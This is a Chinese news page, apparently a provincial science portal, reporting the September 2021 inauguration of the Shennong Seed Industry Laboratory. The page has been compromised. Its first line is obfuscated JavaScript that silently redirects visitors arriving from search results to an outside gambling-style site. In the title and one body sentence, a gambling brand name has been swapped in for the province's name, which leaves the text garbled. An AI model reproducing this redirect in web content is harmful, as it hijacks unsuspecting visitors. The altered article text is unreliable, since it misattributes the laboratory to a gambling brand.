var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

中国竞彩网

图片

当前位置:首页 工作动态

神农种业实验室揭牌成立


发布日期:2021-09-24 16:45来源:基础研究处 阅读次数:

  9月23日上午,神农种业实验室揭牌仪式在省农业科学院举行,楼阳生为神农种业实验室揭牌并讲话,王凯向中国工程院院士张新友颁发神农种业实验室主任聘书。霍金花副省长宣读了省政府关于建设神农种业实验室的批复并介绍神农种业实验室相关情况。

  神农种业实验室的揭牌是中国竞彩网建设国家科技创新高地、打造种业国家战略科技力量的重大部署,也是扛稳粮食安全重任、推动乡村振兴战略实施的重大科技举措。实验室由省农科院、河南农业大学牵头组建。实验室按照“立足河南、服务全国、面向全球”的总站位,坚持聚焦世界种业科技前沿、聚焦国家粮食安全战略、聚焦人民美好生活需求,以我国“种业科技自立自强、种源自主可控”为目标,以种子、种畜、种苗为对象,聚焦建设一流创新平台、凝聚一流创新人才、构建一流创新生态、解决种业重大科学问题、攻克种业关键核心技术、培育突破性新品种等6项主要任务,着力锻长板、扬优势、拓领域、攻难关,在种业关键技术和重点品种研发上取得突破,力争成为国家种业战略科技力量,打造全球种业科技创新高地。